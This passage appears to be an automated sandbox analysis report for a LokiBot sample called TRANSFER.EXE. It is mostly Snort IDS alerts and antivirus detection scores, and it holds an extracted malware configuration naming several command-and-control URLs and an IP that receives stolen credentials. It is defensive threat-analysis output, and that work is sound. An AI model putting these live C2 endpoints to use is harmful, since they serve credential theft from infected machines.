                Destination Port:49816
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449769802021641 08/05/22-09:10:41.114928
                SID:2021641
                Source Port:49769
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449771802825766 08/05/22-09:10:46.236811
                SID:2825766
                Source Port:49771
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:45.11.26.144192.168.2.680497992025483 08/05/22-09:11:18.985893
                SID:2025483
                Source Port:80
                Destination Port:49799
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449806802021641 08/05/22-09:11:25.288207
                SID:2021641
                Source Port:49806
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449774802021641 08/05/22-09:10:53.861086
                SID:2021641
                Source Port:49774
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449812802024313 08/05/22-09:11:35.695582
                SID:2024313
                Source Port:49812
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449787802021641 08/05/22-09:10:58.658888
                SID:2021641
                Source Port:49787
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449869802021641 08/05/22-09:12:11.819483
                SID:2021641
                Source Port:49869
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:45.11.26.144192.168.2.680498812025483 08/05/22-09:12:23.851052
                SID:2025483
                Source Port:80
                Destination Port:49881
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449812802024318 08/05/22-09:11:35.695582
                SID:2024318
                Source Port:49812
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449788802825766 08/05/22-09:11:01.711456
                SID:2825766
                Source Port:49788
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:45.11.26.144192.168.2.680498832025483 08/05/22-09:12:26.294071
                SID:2025483
                Source Port:80
                Destination Port:49883
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449811802021641 08/05/22-09:11:33.059063
                SID:2021641
                Source Port:49811
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449775802024313 08/05/22-09:10:56.189285
                SID:2024313
                Source Port:49775
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.68.8.8.857422532014169 08/05/22-09:12:15.716804
                SID:2014169
                Source Port:57422
                Destination Port:53
                Protocol:UDP
                Classtype:Potentially Bad Traffic
                Timestamp:192.168.2.645.11.26.14449775802024318 08/05/22-09:10:56.189285
                SID:2024318
                Source Port:49775
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.68.8.8.861116532014169 08/05/22-09:10:49.152167
                SID:2014169
                Source Port:61116
                Destination Port:53
                Protocol:UDP
                Classtype:Potentially Bad Traffic
                Timestamp:192.168.2.645.11.26.14449788802025381 08/05/22-09:11:01.711456
                SID:2025381
                Source Port:49788
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.68.8.8.852089532014169 08/05/22-09:11:09.042075
                SID:2014169
                Source Port:52089
                Destination Port:53
                Protocol:UDP
                Classtype:Potentially Bad Traffic
                Timestamp:192.168.2.645.11.26.14449820802825766 08/05/22-09:11:55.767753
                SID:2825766
                Source Port:49820
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449860802024313 08/05/22-09:12:05.554361
                SID:2024313
                Source Port:49860
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449799802021641 08/05/22-09:11:17.792361
                SID:2021641
                Source Port:49799
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:45.11.26.144192.168.2.680497882025483 08/05/22-09:11:02.864394
                SID:2025483
                Source Port:80
                Destination Port:49788
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.68.8.8.850081532014169 08/05/22-09:11:19.957970
                SID:2014169
                Source Port:50081
                Destination Port:53
                Protocol:UDP
                Classtype:Potentially Bad Traffic
                Timestamp:192.168.2.645.11.26.14449773802025381 08/05/22-09:10:51.481984
                SID:2025381
                Source Port:49773
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449860802024318 08/05/22-09:12:05.554361
                SID:2024318
                Source Port:49860
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449795802024313 08/05/22-09:11:09.138567
                SID:2024313
                Source Port:49795
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449832802024313 08/05/22-09:12:00.816507
                SID:2024313
                Source Port:49832
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449795802024318 08/05/22-09:11:09.138567
                SID:2024318
                Source Port:49795
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.68.8.8.857269532014169 08/05/22-09:12:22.498824
                SID:2014169
                Source Port:57269
                Destination Port:53
                Protocol:UDP
                Classtype:Potentially Bad Traffic
                Timestamp:192.168.2.645.11.26.14449768802825766 08/05/22-09:10:38.844396
                SID:2825766
                Source Port:49768
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.68.8.8.856591532014169 08/05/22-09:10:41.016166
                SID:2014169
                Source Port:56591
                Destination Port:53
                Protocol:UDP
                Classtype:Potentially Bad Traffic
                Timestamp:192.168.2.645.11.26.14449881802025381 08/05/22-09:12:22.599825
                SID:2025381
                Source Port:49881
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449808802021641 08/05/22-09:11:29.964196
                SID:2021641
                Source Port:49808
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449823802025381 08/05/22-09:11:58.081188
                SID:2025381
                Source Port:49823
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.68.8.8.861607532014169 08/05/22-09:10:56.080751
                SID:2014169
                Source Port:61607
                Destination Port:53
                Protocol:UDP
                Classtype:Potentially Bad Traffic
                Timestamp:45.11.26.144192.168.2.680498462025483 08/05/22-09:12:04.472524
                SID:2025483
                Source Port:80
                Destination Port:49846
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449772802021641 08/05/22-09:10:49.248779
                SID:2021641
                Source Port:49772
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.68.8.8.851666532014169 08/05/22-09:10:58.559114
                SID:2014169
                Source Port:51666
                Destination Port:53
                Protocol:UDP
                Classtype:Potentially Bad Traffic
                Timestamp:192.168.2.645.11.26.14449791802825766 08/05/22-09:11:04.815056
                SID:2825766
                Source Port:49791
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.68.8.8.862643532014169 08/05/22-09:11:04.707423
                SID:2014169
                Source Port:62643
                Destination Port:53
                Protocol:UDP
                Classtype:Potentially Bad Traffic
                Timestamp:45.11.26.144192.168.2.680498602025483 08/05/22-09:12:06.810702
                SID:2025483
                Source Port:80
                Destination Port:49860
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449814802021641 08/05/22-09:11:41.090702
                SID:2021641
                Source Port:49814
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449832802024318 08/05/22-09:12:00.816507
                SID:2024318
                Source Port:49832
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449773802024318 08/05/22-09:10:51.481984
                SID:2024318
                Source Port:49773
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449816802024313 08/05/22-09:11:45.230367
                SID:2024313
                Source Port:49816
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:45.11.26.144192.168.2.680497712025483 08/05/22-09:10:47.482676
                SID:2025483
                Source Port:80
                Destination Port:49771
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449773802024313 08/05/22-09:10:51.481984
                SID:2024313
                Source Port:49773
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449804802021641 08/05/22-09:11:20.056413
                SID:2021641
                Source Port:49804
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449816802024318 08/05/22-09:11:45.230367
                SID:2024318
                Source Port:49816
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449813802021641 08/05/22-09:11:38.357337
                SID:2021641
                Source Port:49813
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449808802025381 08/05/22-09:11:29.964196
                SID:2025381
                Source Port:49808
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.68.8.8.859106532014169 08/05/22-09:11:53.220746
                SID:2014169
                Source Port:59106
                Destination Port:53
                Protocol:UDP
                Classtype:Potentially Bad Traffic
                Timestamp:192.168.2.68.8.8.849463532014169 08/05/22-09:12:03.092143
                SID:2014169
                Source Port:49463
                Destination Port:53
                Protocol:UDP
                Classtype:Potentially Bad Traffic
                Timestamp:192.168.2.645.11.26.14449775802825766 08/05/22-09:10:56.189285
                SID:2825766
                Source Port:49775
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:45.11.26.144192.168.2.680497732025483 08/05/22-09:10:52.735646
                SID:2025483
                Source Port:80
                Destination Port:49773
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:45.11.26.144192.168.2.680497742025483 08/05/22-09:10:55.059781
                SID:2025483
                Source Port:80
                Destination Port:49774
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449883802021641 08/05/22-09:12:25.116712
                SID:2021641
                Source Port:49883
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449818802025381 08/05/22-09:11:53.331696
                SID:2025381
                Source Port:49818
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449823802021641 08/05/22-09:11:58.081188
                SID:2021641
                Source Port:49823
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449806802024313 08/05/22-09:11:25.288207
                SID:2024313
                Source Port:49806
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449881802024318 08/05/22-09:12:22.599825
                SID:2024318
                Source Port:49881
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449806802024318 08/05/22-09:11:25.288207
                SID:2024318
                Source Port:49806
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449876802024313 08/05/22-09:12:15.818317
                SID:2024313
                Source Port:49876
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.68.8.8.852698532014169 08/05/22-09:11:13.360201
                SID:2014169
                Source Port:52698
                Destination Port:53
                Protocol:UDP
                Classtype:Potentially Bad Traffic
                Timestamp:192.168.2.645.11.26.14449787802024313 08/05/22-09:10:58.658888
                SID:2024313
                Source Port:49787
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449881802024313 08/05/22-09:12:22.599825
                SID:2024313
                Source Port:49881
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449820802025381 08/05/22-09:11:55.767753
                SID:2025381
                Source Port:49820
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449869802024318 08/05/22-09:12:11.819483
                SID:2024318
                Source Port:49869
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449787802024318 08/05/22-09:10:58.658888
                SID:2024318
                Source Port:49787
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449869802024313 08/05/22-09:12:11.819483
                SID:2024313
                Source Port:49869
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449813802825766 08/05/22-09:11:38.357337
                SID:2825766
                Source Port:49813
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449876802024318 08/05/22-09:12:15.818317
                SID:2024318
                Source Port:49876
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449775802021641 08/05/22-09:10:56.189285
                SID:2021641
                Source Port:49775
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.68.8.8.855083532014169 08/05/22-09:11:38.248653
                SID:2014169
                Source Port:55083
                Destination Port:53
                Protocol:UDP
                Classtype:Potentially Bad Traffic
                Timestamp:45.11.26.144192.168.2.680498692025483 08/05/22-09:12:13.145529
                SID:2025483
                Source Port:80
                Destination Port:49869
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449883802825766 08/05/22-09:12:25.116712
                SID:2825766
                Source Port:49883
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449791802025381 08/05/22-09:11:04.815056
                SID:2025381
                Source Port:49791
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449768802024312 08/05/22-09:10:38.844396
                SID:2024312
                Source Port:49768
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449799802024318 08/05/22-09:11:17.792361
                SID:2024318
                Source Port:49799
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.68.8.8.849520532014169 08/05/22-09:11:25.186861
                SID:2014169
                Source Port:49520
                Destination Port:53
                Protocol:UDP
                Classtype:Potentially Bad Traffic
                Timestamp:192.168.2.645.11.26.14449768802024317 08/05/22-09:10:38.844396
                SID:2024317
                Source Port:49768
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449774802024313 08/05/22-09:10:53.861086
                SID:2024313
                Source Port:49774
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:45.11.26.144192.168.2.680497872025483 08/05/22-09:10:59.837244
                SID:2025483
                Source Port:80
                Destination Port:49787
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449860802021641 08/05/22-09:12:05.554361
                SID:2021641
                Source Port:49860
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449832802825766 08/05/22-09:12:00.816507
                SID:2825766
                Source Port:49832
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449774802024318 08/05/22-09:10:53.861086
                SID:2024318
                Source Port:49774
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449771802021641 08/05/22-09:10:46.236811
                SID:2021641
                Source Port:49771
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449799802024313 08/05/22-09:11:17.792361
                SID:2024313
                Source Port:49799
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449880802025381 08/05/22-09:12:19.118779
                SID:2025381
                Source Port:49880
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.68.8.8.851748532014169 08/05/22-09:10:45.856847
                SID:2014169
                Source Port:51748
                Destination Port:53
                Protocol:UDP
                Classtype:Potentially Bad Traffic
                Timestamp:192.168.2.645.11.26.14449823802825766 08/05/22-09:11:58.081188
                SID:2825766
                Source Port:49823
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449797802825766 08/05/22-09:11:13.734140
                SID:2825766
                Source Port:49797
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449832802021641 08/05/22-09:12:00.816507
                SID:2021641
                Source Port:49832
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.68.8.8.853049532014169 08/05/22-09:11:29.434938
                SID:2014169
                Source Port:53049
                Destination Port:53
                Protocol:UDP
                Classtype:Potentially Bad Traffic
                Timestamp:45.11.26.144192.168.2.680498802025483 08/05/22-09:12:20.337044
                SID:2025483
                Source Port:80
                Destination Port:49880
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449846802025381 08/05/22-09:12:03.190477
                SID:2025381
                Source Port:49846
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449811802025381 08/05/22-09:11:33.059063
                SID:2025381
                Source Port:49811
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.645.11.26.14449804802825766 08/05/22-09:11:20.056413
                SID:2825766
                Source Port:49804
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: TRANSFER.EXEVirustotal: Detection: 24%Perma Link
                Source: TRANSFER.EXEReversingLabs: Detection: 15%
                Source: http://sempersim.su/gi4/fre.phpAvira URL Cloud: Label: malware
                Source: sempersim.suVirustotal: Detection: 27%Perma Link
                Source: http://sempersim.su/gi4/fre.phpVirustotal: Detection: 23%Perma Link
                Source: 00000000.00000002.409421719.0000000003B05000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://sempersim.su/gi4/fre.php"]}

                Exploits

                barindex
                Source: Yara matchFile source: 0.2.TRANSFER.EXE.451dcd0.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.410543531.0000000004510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: TRANSFER.EXE PID: 5732, type: MEMORYSTR
                Source: TRANSFER.EXEStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: D:\v2.0\A1\_work\56\obj\Release.AnyCPU\Search.Client.Shared\MS.VS.Services.Search.Shared.WebApi\Microsoft.VisualStudio.Services.Search.Shared.WebApi.pdb source: TRANSFER.EXE
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 1_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,

                Networking

                barindex
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:58723 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.6:49767 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49767 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49767 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.6:49767 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49767 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:51971 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.6:49768 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49768 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49768 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.6:49768 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49768 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:56591 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49769 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49769 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49769 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49769 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49769 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.11.26.144:80 -> 192.168.2.6:49769
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:60350 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49770 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49770 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49770 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49770 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49770 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.11.26.144:80 -> 192.168.2.6:49770
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:51748 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49771 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49771 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49771 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49771 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49771 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.11.26.144:80 -> 192.168.2.6:49771
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:61116 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49772 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49772 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49772 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49772 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49772 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.11.26.144:80 -> 192.168.2.6:49772
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:50958 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49773 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49773 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49773 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49773 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49773 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.11.26.144:80 -> 192.168.2.6:49773
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:49695 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49774 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49774 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49774 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49774 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49774 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.11.26.144:80 -> 192.168.2.6:49774
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:61607 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49775 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49775 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49775 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49775 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49775 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.11.26.144:80 -> 192.168.2.6:49775
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:51666 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49787 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49787 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49787 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49787 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49787 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.11.26.144:80 -> 192.168.2.6:49787
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:57037 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49788 -> 45.11.26.144:80
